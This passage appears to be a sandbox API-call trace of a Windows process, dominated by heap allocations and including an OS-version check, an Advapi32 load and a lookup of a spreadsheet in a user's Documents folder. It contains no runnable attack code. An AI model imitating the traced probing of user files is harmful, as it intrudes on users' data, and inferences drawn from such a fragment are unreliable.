RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0261.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0261.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0261.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0261.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0261.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0261.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0261.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0261.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0261.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0261.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0261.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0261.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0261.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0261.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0261.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.201] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0261.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0261.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0261.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0261.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0261.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0261.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0261.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.202] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0261.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0261.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0261.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0261.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0261.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0261.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0261.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0261.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0261.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.203] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/D3BEewSKP- XS.xlsx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee327a60, ftCreationTime.dwHighDateTime=0x1d4c3a6, ftLastAccessTime.dwLowDateTime=0x70160dd0, ftLastAccessTime.dwHighDateTime=0x1d4b8b2, ftLastWriteTime.dwLowDateTime=0x70160dd0, ftLastWriteTime.dwHighDateTime=0x1d4b8b2, nFileSizeHigh=0x0, nFileSizeLow=0xfecf, dwReserved0=0x98c0047, dwReserved1=0x22a9a, cFileName="D3BEewSKP- XS.xlsx", cAlternateFileName="D3BEEW~1.XLS")) returned 0xaa59a0 [0261.203] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0261.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0261.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.204] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0261.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0261.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0261.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0261.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0261.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0261.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.206] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.206] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0261.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.206] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.206] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0261.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.207] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0261.207] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.207] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.207] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.207] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.208] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0261.208] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.209] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.209] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0261.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.210] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.210] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.210] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0261.210] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.210] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0261.210] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.210] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.210] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.228] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.228] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.228] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.228] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0261.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0261.228] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0261.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.228] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.229] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0261.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.229] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.229] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0261.229] PeekMessageW 